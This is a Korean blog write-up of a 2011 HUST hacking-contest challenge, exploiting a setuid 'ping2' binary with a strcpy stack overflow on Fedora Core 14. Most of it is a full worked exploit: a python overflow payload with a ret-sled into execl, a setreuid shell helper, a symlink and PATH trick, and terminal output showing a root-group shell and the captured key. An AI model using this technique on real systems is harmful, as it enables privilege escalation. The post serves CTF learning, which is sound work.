내가낸 HUST 해킹대회 K번 문제 풀이법

WG 혁이가 쓴 문제풀이법.. 

[출처] http://hkkiw0823.pe.kr/xe/index.php?mid=Security&document_srl=854

http://www.hackerschool.org/Sub_Html/HS_University/CTF/Codegate/2011/vuln300/vuln300.html

몽이형의 코드게이트 문제 풀이 강좌 

================================출처 포너.tistory ======================================

hust K번 풀이

대회 서버에 접속하면 ping2 파일이 있다.
ping2 파일이 하는일을 보기위해 소스를 보았다.

 

dr-xr-xr-x. 2 whatthe whatthe 4096 2011-10-03 09:41 .
drwxr-xr-x. 5 root    root    4096 2011-10-01 08:40 ..
lrwxrwxrwx. 1 root    root       9 2011-10-03 09:41 .bash_history -> /dev/null
-rw-r--r--. 1 whatthe whatthe   18 2010-06-23 00:15 .bash_logout
-rw-r--r--. 1 whatthe whatthe  176 2010-06-23 00:15 .bash_profile
-rw-r--r--. 1 whatthe whatthe  124 2010-06-23 00:15 .bashrc
-r-sr-xr-x. 1 gotroot gotroot 4907 2011-10-01 08:31 ping2
-rw-r--r--. 1 root    root     268 2011-10-01 08:31 ping2.c

[whatthe@k1rha ~]$ cat ping2.c
#include<stdio.h>
#include<string.h>
#include<stdlib.h>

extern char **environ;
int main(int argc,char* argv[]){

 
 char buff[100];

 if(argc<2){
  printf("Usage : ./[file] [argv]\n");
 }
 else{
  strcpy(buff,argv[1]);
  printf("%s\n",buff);
  system("ls"); 
 }

}

 

소스를 보면 전형적인 buffer overflow 문제이다.
대회 환경은 fedora core 14이다.

 

[whatthe@k1rha ~]$ uname -a
Linux k1rha 2.6.35.14-96.fc14.i686 #1 SMP Thu Sep 1 12:49:38 UTC 2011 i686 i686 i386 GNU/Linux

 

[whatthe@k1rha ~]$ cat /proc/self/maps
005c4000-00747000 r-xp 00000000 fd:00 1049216    /lib/libc-2.13.so
00747000-00748000 ---p 00183000 fd:00 1049216    /lib/libc-2.13.so
00748000-0074a000 r--p 00183000 fd:00 1049216    /lib/libc-2.13.so
0074a000-0074b000 rw-p 00185000 fd:00 1049216    /lib/libc-2.13.so

[whatthe@k1rha ~]$ cat /proc/self/maps
00d79000-00efc000 r-xp 00000000 fd:00 1049216    /lib/libc-2.13.so
00efc000-00efd000 ---p 00183000 fd:00 1049216    /lib/libc-2.13.so
00efd000-00eff000 r--p 00183000 fd:00 1049216    /lib/libc-2.13.so
00eff000-00f00000 rw-p 00185000 fd:00 1049216    /lib/libc-2.13.so

 

랜덤라이브러리에 아스키아머까지 걸려있다 -_-;
남아있는 희망을 위해 주소가 올 랜덤인지 확인하였다.

 

[whatthe@k1rha ~]$ gdb -q ping
Reading symbols from /bin/ping...(no debugging symbols found)...done.
Missing separate debuginfos, use: debuginfo-install iputils-20100418-3.fc14.i686
(gdb) b main
Breakpoint 1 at 0x8048427
(gdb) r
Starting program: /home/whatthe/ping2

Breakpoint 1, 0x08048427 in main ()
Missing separate debuginfos, use: debuginfo-install glibc-2.13-2.i686
(gdb) p execl
$1 = {<text variable, no debug info>} 0x1ac670 <execl>
(gdb) p execl

 

gdb로 살펴본 해본 결과 6~8번에 한번 꼴로 '0x1ac670' 주소가 반복 된다.

[whatthe@k1rha ~]$ strace ./ping2 `python -c 'print "a"*112+"\x37\x85\x04\x08"*22+"\x70\xc6\x1a"'`

execve("./ping2", ["./ping2", "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"...], [/* 27 vars */]) = 0
brk(0)                                  = 0x817f000
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb782f000

 .... 중략 ...

--- {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=11715, si_status=0, si_utime=0, si_stime=0} (Child exited) ---
execve("1\355^\211\341\203\344\360PTRh\340\204\4\10h\200\204\4\10QVh$\204\4\10\350\243\377\377\377\364\220\220\220\220\220\220\220\220\220\220\220\220\220\220U\211\345S\215d$\374\200=\4\227\4\10", [], [/* 27 vars */]) = -1 ENOENT (No such file or directory)
--- {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x2} (Segmentation fault) ---
+++ killed by SIGSEGV +++
?멸렇硫????댁?? ?ㅻ쪟
[whatthe@k1rha ~]$

ret 슬레딩으로 인자를 고정값이 있는곳으로 옮기고 execl함수를 실행시키면
6~8번에 한번꼴로 execve 함수가 실행이 되는것을 볼 수있다.

 

"1\355^\211\341\203\344\360PTRh\340\204\4\10h\200\204\4\10QVh$\204\4\10\350\243\377\377\377\364\220\220\220\220\220\220\220\220\220\220\220\220\220\220U\211\345S\215d$\374\200=\4\227\4\10"

 

이 고정값을 실행하고 권한 재설정을 위해 심볼릭싱크를 걸었다.
 
[whatthe@k1rha ~]$ cd /tmp
[whatthe@k1rha tmp]$ mkdir hkkiw0823 ; cd hkkiw0823/
[whatthe@k1rha hkkiw0823]$ cat > ex.c
#include <stdio.h>

void main(){
 setreuid(geteuid(),geteuid());
 execl("/bin/sh","sh",0);
}

[whatthe@k1rha hkkiw0823]$ gcc -o ex ex.
[whatthe@k1rha hkkiw0823]$ ln -s ex `python -c 'print "1\355^\211\341\203\344\360PTRh\340\204\4\10h\200\204\4\10QVh$\204\4\10\350\243\377\377\377\364\220\220\220\220\220\220\220\220\220\220\220\220\220\220U\211\345S\215d$\374\200=\4\227\4\10"'`
[whatthe@k1rha hkkiw0823]$ export PATH=./:$PATH

[whatthe@k1rha hkkiw0823]$ ls
1?^?????PTRh????h????QVh$????????????????????U??S?d$??=????  ex

 

6~7번 정도 실행해보면 쉘이 따인다.

 

[whatthe@k1rha hkkiw0823]$ /home/whatthe/ping2 `python -c 'print "a"*112+"\x37\x85\x04\x08"*22+"\x70\xc6\x1a"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?p?
1?^?????PTRh????h????QVh$????????????????????U??S?d$??=????  ex
?멸렇硫????댁?? ?ㅻ쪟
[whatthe@k1rha hkkiw0823]$ /home/whatthe/ping2 `python -c 'print "a"*112+"\x37\x85\x04\x08"*22+"\x70\xc6\x1a"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?p?
1?^?????PTRh????h????QVh$????????????????????U??S?d$??=????  ex
?멸렇硫????댁?? ?ㅻ쪟
[whatthe@k1rha hkkiw0823]$ /home/whatthe/ping2 `python -c 'print "a"*112+"\x37\x85\x04\x08"*22+"\x70\xc6\x1a"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?p?
1?^?????PTRh????h????QVh$????????????????????U??S?d$??=????  ex
?멸렇硫????댁?? ?ㅻ쪟
[whatthe@k1rha hkkiw0823]$ /home/whatthe/ping2 `python -c 'print "a"*112+"\x37\x85\x04\x08"*22+"\x70\xc6\x1a"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?p?
1?^?????PTRh????h????QVh$????????????????????U??S?d$??=????  ex
?멸렇硫????댁?? ?ㅻ쪟
[whatthe@k1rha hkkiw0823]$ /home/whatthe/ping2 `python -c 'print "a"*112+"\x37\x85\x04\x08"*22+"\x70\xc6\x1a"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?7?p?
1?^?????PTRh????h????QVh$????????????????????U??S?d$??=????  ex
sh-4.1$ 
sh-4.1$ 
sh-4.1$ id
uid=503(gotroot) gid=502(whatthe) groups=503(gotroot),502(whatthe) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.1$ /bin/bash
[gotroot@k1rha hkkiw0823]$ cd /home
[gotroot@k1rha home]$ ls
gotroot  point  whatthe
[gotroot@k1rha home]$ cd gotroot/
[gotroot@k1rha gotroot]$ ls
keyvalueresult
[gotroot@k1rha gotroot]$ cat keyvalueresult

wantedGirlfriend

키 : wantedGirlfriend